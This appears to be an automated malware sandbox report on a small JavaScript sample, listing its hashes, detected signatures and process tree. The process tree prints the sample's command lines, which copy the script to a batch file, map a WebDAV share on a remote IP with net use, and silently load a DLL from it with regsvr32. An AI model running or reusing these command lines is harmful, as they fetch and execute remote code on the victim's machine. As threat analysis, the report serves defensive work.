Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10/07/2024, 13:49
Static task: static1
Behavioral task: behavioral1
  Sample: 164962732970732594.js
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 164962732970732594.js
  Resource: win10v2004-20240709-en
General
Target: 164962732970732594.js
Size: 5KB
MD5: a6b2a59f6d83b8cc55113b7373909b77
SHA1: 1dc6f69b3a2088a101d6bee2f4a2af8de2de1c04
SHA256: 90b640d05694d5b6443dd4b5ac15467cdd1770e26d3a396cc3f7eedf8815395c
SHA512: 74279ce9b4c82ab5d5c8fd9a0d9cad7ca2d40f27e226791946f6d477bfe6de445bbb69bf285a9479b740c4da6293b323083796a97b068f17fa5941fab27ff8d0
SSDEEP: 96:Bs9Kmsh6bskUzzFPiv+FRTQszC+FRTOIgisUj12uiDKIvXoEPkuEq:1Gfisu2bB/okkuz
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation (process: wscript.exe)
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  PID 3324 wrote to memory of 2444 (pid: 3324, process: wscript.exe, procid_target: 82)
  PID 3324 wrote to memory of 2444 (pid: 3324, process: wscript.exe, procid_target: 82)
  PID 2444 wrote to memory of 3032 (pid: 2444, process: cmd.exe, procid_target: 84)
  PID 2444 wrote to memory of 3032 (pid: 2444, process: cmd.exe, procid_target: 84)
  PID 2444 wrote to memory of 4280 (pid: 2444, process: cmd.exe, procid_target: 85)
  PID 2444 wrote to memory of 4280 (pid: 2444, process: cmd.exe, procid_target: 85)
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\164962732970732594.js
   PID: 3324
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\164962732970732594.js" "C:\Users\Admin\\vmmoin.bat" && "C:\Users\Admin\\vmmoin.bat"
      PID: 2444
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\net.exe
         Command line: net use \\45.9.74.13@8888\DavWWWRoot\
         PID: 3032
      3. C:\Windows\system32\regsvr32.exe
         Command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\115.dll
         PID: 4280
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 5KB
MD5: a6b2a59f6d83b8cc55113b7373909b77
SHA1: 1dc6f69b3a2088a101d6bee2f4a2af8de2de1c04
SHA256: 90b640d05694d5b6443dd4b5ac15467cdd1770e26d3a396cc3f7eedf8815395c
SHA512: 74279ce9b4c82ab5d5c8fd9a0d9cad7ca2d40f27e226791946f6d477bfe6de445bbb69bf285a9479b740c4da6293b323083796a97b068f17fa5941fab27ff8d0